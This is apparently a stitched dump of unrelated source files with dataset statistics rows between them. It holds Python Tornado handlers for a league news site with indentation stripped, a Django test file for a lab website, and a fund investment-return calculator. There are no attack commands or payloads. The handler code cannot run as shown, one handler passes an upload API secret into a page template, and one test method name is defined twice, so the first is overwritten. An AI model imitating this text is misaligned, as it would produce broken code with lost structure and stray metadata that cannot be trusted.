access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/category.html',
is_login=is_login,
league_info=league_info,
sceneries=sceneries,
news=news,
hots=hots,
populars=populars,
activities=activities,
lastest_comments=lastest_comments,
multimedias=multimedias,
league_id=LEAGUE_ID,
category_id=category_id,
api_domain=API_DOMAIN,
category=category)
class NewsupCategorySearchHandler(BaseHandler):
def get(self):
logging.info(self.request)
category_id = self.get_argument("id", "")
# league(联盟信息)
league_info = self.get_league_info()
# query category_name by category_id
url = API_DOMAIN+"/api/categories/" + category_id
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
category = data['rs']
# query by category_id
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":category_id, "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
sceneries = data['rs']
for article in sceneries:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
# recently articles(最新文章news)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# hot(热点新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"1b86ad38f73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
hots = data['rs']
for article in hots:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/category-search.html',
is_login=is_login,
league_info=league_info,
sceneries=sceneries,
news=news,
hots=hots,
populars=populars,
activities=activities,
lastest_comments=lastest_comments,
multimedias=multimedias,
league_id=LEAGUE_ID,
category_id=category_id,
api_domain=API_DOMAIN,
category=category)
class NewsupFranchisesHandler(BaseHandler):
def get(self):
logging.info(self.request)
franchise_type = self.get_argument("franchise_type", "")
franchise_type = franchise_type.encode('utf-8')
logging.info("got franchise_type %r from argument", franchise_type)
# league(联盟信息)
league_info = self.get_league_info()
# franchises(景区)
params = {"franchise_type":franchise_type, "page":1, "limit":1}
url = url_concat(API_DOMAIN+"/api/leagues/"+LEAGUE_ID+"/clubs", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
franchises = data['rs']['data']
for franchise in franchises:
franchise['create_time'] = timestamp_friendly_date(franchise['create_time'])
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
# recently articles(最新文章news)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# hot(热点新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"1b86ad38f73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
hots = data['rs']
for article in hots:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/franchises.html',
is_login=is_login,
league_info=league_info,
franchises=franchises,
multimedias=multimedias,
news=news,
hots= hots,
populars=populars,
activities=activities,
lastest_comments=lastest_comments,
league_id=LEAGUE_ID,
api_domain=API_DOMAIN,
franchise_type=franchise_type)
class NewsupFranchiseDetailHandler(BaseHandler):
def get(self):
logging.info(self.request)
franchise_id = self.get_argument("id", "")
access_token = self.get_secure_cookie("access_token")
# league(联盟信息)
league_info = self.get_league_info()
# recently articles(最新文章news)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# article
url = API_DOMAIN+"/api/clubs/"+franchise_id
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got article response %r", response.body)
data = json_decode(response.body)
franchise = data['rs']
if not franchise.has_key('paragraphs'):
franchise['paragraphs'] = ''
if not franchise.has_key('franchise_type'):
franchise['franchise_type'] = 'franchise'
if franchise.has_key('create_time'):
franchise['create_time'] = timestamp_friendly_date(franchise['create_time'])
else:
franchise['create_time'] = timestamp_friendly_date(0)
# franchise['create_time'] = timestamp_friendly_date(franchise['create_time'])
# hot(热点新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"1b86ad38f73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
hots = data['rs']
for article in hots:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# update read_num
read_num = franchise['read_num']
url = API_DOMAIN+"/api/articles/"+franchise_id+"/read"
http_client = HTTPClient()
_body = {"read_num": read_num+1}
_json = json_encode(_body)
response = http_client.fetch(url, method="POST", body=_json)
logging.info("got update read_num response %r", response.body)
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/franchise-detail.html',
is_login=is_login,
access_token=access_token,
league_info=league_info,
franchise=franchise,
news=news,
populars=populars,
hots=hots,
activities=activities,
multimedias=multimedias,
api_domain=API_DOMAIN,
lastest_comments=lastest_comments)
class NewsupApplyFranchiseHandler(AuthorizationHandler):
@tornado.web.authenticated # if no session, redirect to login page
def get(self):
logging.info(self.request)
# league(联盟信息)
league_info = self.get_league_info()
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
franchise = None
try:
params = {"filter":"franchise"}
url = url_concat(API_DOMAIN+"/api/myinfo", params)
http_client = HTTPClient()
headers={"Authorization":"Bearer "+access_token}
response = http_client.fetch(url, method="GET", headers=headers)
logging.info("got response %r", response.body)
data = json_decode(response.body)
franchise = data['rs']
if franchise:
if not franchise['club'].has_key("province"):
franchise['club']['province'] = ''
franchise['club']['city'] = ''
if not franchise['club'].has_key("city"):
franchise['club']['city'] = ''
if not franchise['club'].has_key("franchise_type"):
franchise['club']['franchise_type'] = ''
franchise['create_time'] = timestamp_datetime(franchise['create_time'])
except:
logging.info("got franchise=[None]")
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
self.render('newsup/apply-franchise.html',
is_login=is_login,
league_info=league_info,
access_token=access_token,
league_id=LEAGUE_ID,
franchise=franchise,
api_domain=API_DOMAIN,
upyun_domain=UPYUN_DOMAIN,
upyun_notify_url=UPYUN_NOTIFY_URL,
upyun_form_api_secret=UPYUN_FORM_API_SECRET,
upyun_bucket=UPYUN_BUCKET,
lastest_comments=lastest_comments)
class NewsupSearchResultHandler(BaseHandler):
def get(self):
logging.info(self.request)
# category_id = self.get_argument("id", "")
# league(联盟信息)
league_info = self.get_league_info()
# query by category_id
# params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":category_id, "idx":0, "limit":6}
# url = url_concat(API_DOMAIN+"/api/articles", params)
# http_client = HTTPClient()
# response = http_client.fetch(url, method="GET")
# logging.info("got sceneries response %r", response.body)
# data = json_decode(response.body)
# sceneries = data['rs']
# for article in sceneries:
# article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
# news(新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0e9a3c68e94511e6b40600163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/search-result.html',
is_login=is_login,
league_info=league_info,
news=news,
populars=populars,
activities=activities,
lastest_comments=lastest_comments,
multimedias=multimedias,
league_id=LEAGUE_ID,
api_domain=API_DOMAIN)
| 42.344051
| 147
| 0.617264
| 5,878
| 52,676
| 5.330384
| 0.045594
| 0.049151
| 0.035236
| 0.056524
| 0.911943
| 0.896751
| 0.885484
| 0.881782
| 0.872558
| 0.855962
| 0
| 0.024716
| 0.253436
| 52,676
| 1,243
| 148
| 42.378117
| 0.772008
| 0.051162
| 0
| 0.873837
| 0
| 0
| 0.177136
| 0.026935
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01758
| false
| 0
| 0.015512
| 0
| 0.051706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fd68838a198e555cedc8ddbc815c1bf6e3f505a
| 14,526
|
py
|
Python
|
communication/tests.py
|
BridgesLab/Lab-Website
|
d6f6c9c068bbf668c253e5943d9514947023e66d
|
[
"CC0-1.0",
"MIT"
] | 6
|
2015-08-31T16:55:16.000Z
|
2022-02-10T08:23:07.000Z
|
communication/tests.py
|
BridgesLab/Lab-Website
|
d6f6c9c068bbf668c253e5943d9514947023e66d
|
[
"CC0-1.0",
"MIT"
] | 30
|
2015-03-22T15:49:31.000Z
|
2020-05-25T23:59:37.000Z
|
communication/tests.py
|
BridgesLab/Lab-Website
|
d6f6c9c068bbf668c253e5943d9514947023e66d
|
[
"CC0-1.0",
"MIT"
] | 6
|
2016-09-07T08:25:21.000Z
|
2020-03-27T10:24:57.000Z
|
"""
This file contains the unit tests for the :mod:`communication` app.
Since this app has no models there is model and view tests:
* :class:`~communication.tests.CommunicationModelTests`
* :class:`~communication.tests.CommunicationViewTests`
"""
from lab_website.tests import BasicTests
from communication.models import LabAddress,LabLocation,Post
from personnel.models import Address, Person
from papers.models import Publication
from projects.models import Project
class CommunicationModelTests(BasicTests):
'''This class tests the views associated with models in the :mod:`communication` app.'''
fixtures = ['test_address',]
def test_create_new_lab_address(self):
'''This test creates a :class:`~communication.models.LabAddress` with the required information.'''
test_address = LabAddress(type='Primary', address=Address.objects.get(pk=1)) #repeat for all required fields
test_address.save()
self.assertEqual(test_address.pk, 1) #presumes no models loaded in fixture data
def test_lab_address_unicode(self):
'''This tests the unicode representation of a :class:`~communication.models.LabAddress`.'''
test_address = LabAddress(type='Primary', address=Address.objects.get(pk=1)) #repeat for all required fields
test_address.save()
self.assertEqual(test_address.pk, 1) #presumes no models loaded in fixture data
self.assertEqual(test_address.__unicode__(), Address.objects.get(pk=1).__unicode__())
def test_create_new_lab_location(self):
'''This test creates a :class:`~communication.models.LabLocation` with the required information only.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1) #presumes no models loaded in fixture data
def test_create_new_lab_location_all(self):
'''This test creates a :class:`~communication.models.LabLocation` with all fields included.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1,
address=Address.objects.get(pk=1),
url = 'www.cityofmemphis.org',
description = 'some description about the place',
lattitude = 35.149534,
longitude = -90.04898,) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1) #presumes no models loaded in fixture data
def test_lab_location_unicode(self):
'''This test creates a :class:`~communication.models.LabLocation` with the required information only.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1)
self.assertEqual(test_location.__unicode__(), 'Memphis')
class CommunicationViewTests(BasicTests):
'''This class tests the views associated with the :mod:`communication` app.'''
def test_feed_details_view(self):
"""This tests the feed-details view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/feeds')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'feed_details.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('google_calendar_id' in test_response.context)
def test_lab_rules_view(self):
'''This tests the lab-rules view.
The tests ensure that the correct template is used.
It also tests whether the correct context is passed (if included).
his view uses a user with superuser permissions so does not test the permission levels for this view.'''
test_response = self.client.get('/lab-rules')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'lab_rules.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('lab_rules' in test_response.context)
self.assertTrue('lab_rules_source' in test_response.context)
def test_lab_rules_view(self):
'''This tests the data-resource-sharing view.
The tests ensure that the correct template is used.
It also tests whether the correct context is passed (if included).
his view uses a user with superuser permissions so does not test the permission levels for this view.'''
test_response = self.client.get('/data-resource-sharing')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'data_sharing_policy.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('data_sharing_policy' in test_response.context)
self.assertTrue('data_sharing_policy_source' in test_response.context)
def test_twitter_view(self):
'''This tests the twitter view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/twitter')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'twitter_timeline.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('timeline' in test_response.context)
def test_calendar_view(self):
'''This tests the google-calendar view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/calendar')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'calendar.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('google_calendar_id' in test_response.context)
#
# def test_wikipedia_view(self):
# '''This tests the google-calendar view.
#
# Currently it just ensures that the template is loading correctly.
# '''
# test_response = self.client.get('/wikipedia')
# self.assertEqual(test_response.status_code, 200)
# self.assertTemplateUsed(test_response, 'wikipedia_edits.html')
# self.assertTemplateUsed(test_response, 'base.html')
# self.assertTemplateUsed(test_response, 'jquery_script.html')
# self.assertTrue('pages' in test_response.context)
def test_news_view(self):
'''This tests the lab-news view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/news')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'lab_news.html')
self.assertTemplateUsed(test_response, 'base.html')
#self.assertTrue('statuses' in test_response.context)
self.assertTrue('links' in test_response.context)
#self.assertTrue('milestones' in test_response.context)
def test_contact_page(self):
'''This tests the contact-page view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/contact/')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'contact.html')
self.assertTemplateUsed(test_response, 'base.html')
def test_location_page(self):
'''This tests the location view.
Currently it ensures that the template is loading, and that that the location_list context is passed.
'''
test_response = self.client.get('/location')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'location.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('lablocation_list' in test_response.context)
class PostModelTests(BasicTests):
'''This class tests various aspects of the :class:`~papers.models.Post` model.'''
fixtures = ['test_publication','test_publication_personnel', 'test_project', 'test_personnel']
def test_create_new_post_minimum(self):
'''This test creates a :class:`~papers.models.Post` with the required information only.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.pk, 1)
def test_create_new_post_all(self):
'''This test creates a :class:`~papers.models.Post` with all fields entered.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md',
paper = Publication.objects.get(pk=1),
project = Project.objects.get(pk=1))
test_post.save()
self.assertEqual(test_post.pk, 1)
def test_post_unicode(self):
'''This test creates a :class:`~papers.models.Post` and then verifies the unicode representation is correct.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.__unicode__(), "Test Post")
def test_post_slugify(self):
'''This test creates a :class:`~papers.models.Post` and then verifies the unicode representation is correct.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.post_slug, "test-post")
class PostViewTests(BasicTests):
'''These test the views associated with post objects.'''
fixtures = ['test_post','test_publication','test_publication_personnel', 'test_project', 'test_personnel']
def test_post_details_view(self):
"""This tests the post-details view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_detail.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'disqus_snippet.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
self.assertTrue('post' in test_response.context)
test_response = self.client.get('/posts/not-a-fixture-post')
self.assertEqual(test_response.status_code, 404)
def test_post_list(self):
"""This tests the post-list view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_list.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
self.assertTrue('post_list' in test_response.context)
def test_post_new(self):
"""This tests the post-new view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/new')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_form.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
def test_post_edit(self):
"""This tests the post-edit view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post/edit')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_form.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
test_response = self.client.get('/posts/not-a-fixture-post/edit')
self.assertEqual(test_response.status_code, 404)
def test_post_delete(self):
"""This tests the post-edit view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post/delete')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'confirm_delete.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
test_response = self.client.get('/posts/not-a-fixture-post/delete')
self.assertEqual(test_response.status_code, 404)
| 48.744966
| 135
| 0.658474
| 1,686
| 14,526
| 5.516607
| 0.110913
| 0.107085
| 0.097839
| 0.127943
| 0.823352
| 0.790883
| 0.741103
| 0.729384
| 0.714762
| 0.670896
| 0
| 0.007857
| 0.246523
| 14,526
| 298
| 136
| 48.744966
| 0.841937
| 0.313163
| 0
| 0.484277
| 0
| 0
| 0.153252
| 0.043637
| 0
| 0
| 0
| 0
| 0.440252
| 1
| 0.138365
| false
| 0
| 0.031447
| 0
| 0.213836
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b501f5ae4284b9ffa5f05c2ff64466e86336c87a
| 17,647
|
py
|
Python
|
Funds/AIP.py
|
Seaaann/MyQuantReserch
|
acc1e3fd108b049285bcf35bc9d3aa5870143d02
|
[
"MIT"
] | null | null | null |
Funds/AIP.py
|
Seaaann/MyQuantReserch
|
acc1e3fd108b049285bcf35bc9d3aa5870143d02
|
[
"MIT"
] | null | null | null |
Funds/AIP.py
|
Seaaann/MyQuantReserch
|
acc1e3fd108b049285bcf35bc9d3aa5870143d02
|
[
"MIT"
] | null | null | null |
from fund_tools import *
import random
def AIP_Weekly(
code,
start_date,
end_date,
fund_category,
fixed_investment,
freq="Monday",
df=False,
AIP=True,
Total_investment=100000,
):
fund_net_value = get_fund_net_worth(
code, start_date=start_date, end_date=end_date, fund_category=fund_category
)
fund_net_value["WeekDay"] = pd.to_datetime(fund_net_value["净值日期"]).dt.day_name()
if AIP:
fund_net_value["定投金额(本金)"] = 0
for i in range(len(fund_net_value["WeekDay"])):
if fund_net_value["WeekDay"].values[i] == freq:
fund_net_value["定投金额(本金)"][i] = fixed_investment
fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
fund_net_value["购买份额"] = fund_net_value["定投金额(本金)"] / fund_net_value["单位净值"]
fund_net_value["累计份额"] = fund_net_value["购买份额"].cumsum()
fund_net_value["平均成本"] = fund_net_value["累计定投金额(本金)"] / fund_net_value["累计份额"]
fund_net_value["累计收益"] = (
fund_net_value["单位净值"] - fund_net_value["平均成本"]
) * fund_net_value["累计份额"]
start_invest = fund_net_value["定投金额(本金)"].values.nonzero()[0][0]
fund_net_value["持有天数(定投)"] = (
fund_net_value["净值日期"] - fund_net_value["净值日期"][start_invest]
).dt.days + 1
for i in range(len(fund_net_value["持有天数(定投)"])):
if fund_net_value["持有天数(定投)"][i] < 0:
fund_net_value["持有天数(定投)"][i] = 0
fund_net_value["年化收益率"] = (
(fund_net_value["累计收益"] + fund_net_value["累计定投金额(本金)"])
/ fund_net_value["累计定投金额(本金)"]
) ** (365 / fund_net_value["持有天数(定投)"]) - 1
fund_net_value["累计收益率"] = fund_net_value["累计收益"] / fund_net_value["累计定投金额(本金)"]
Stat_df = pd.DataFrame(
{
"基金代码": code,
"持有天数": fund_net_value["持有天数(定投)"].values[-1],
"定投时间": freq,
"定投金额": fixed_investment,
"分投期数": fund_net_value["累计定投金额(本金)"].values[-1] / fixed_investment,
"总购买份额": "%.3f" % fund_net_value["累计份额"].values[-1],
"平均成本": "%.3f" % fund_net_value["平均成本"].values[-1],
"累计收益": "%.3f" % fund_net_value["累计收益"].values[-1],
"累计收益率": "%.3f" % fund_net_value["累计收益率"].values[-1],
"年化收益率": "%.3f" % fund_net_value["年化收益率"].values[-1],
},
index=["AIP"],
)
else:
fund_net_value["直投金额(本金)"] = 0
fund_net_value["直投金额(本金)"][0] = Total_investment
fund_net_value["直投累计购买份额(不变)"] = (
fund_net_value["直投金额(本金)"][0] / fund_net_value["单位净值"][0]
)
fund_net_value["直投累计收益"] = (
fund_net_value["单位净值"] - fund_net_value["单位净值"][0]
) * fund_net_value["直投金额(本金)"][0]
fund_net_value["直投累计收益率"] = (
fund_net_value["直投累计收益"] / fund_net_value["直投累计购买份额(不变)"]
)
fund_net_value["持有天数(直投)"] = (
fund_net_value["净值日期"] - fund_net_value["净值日期"][0]
).dt.days + 1
fund_net_value["直投累计年化收益率"] = (
(fund_net_value["直投金额(本金)"][0] + fund_net_value["直投累计收益"])
/ fund_net_value["直投金额(本金)"][0]
) ** (365 / fund_net_value["持有天数(直投)"]) - 1
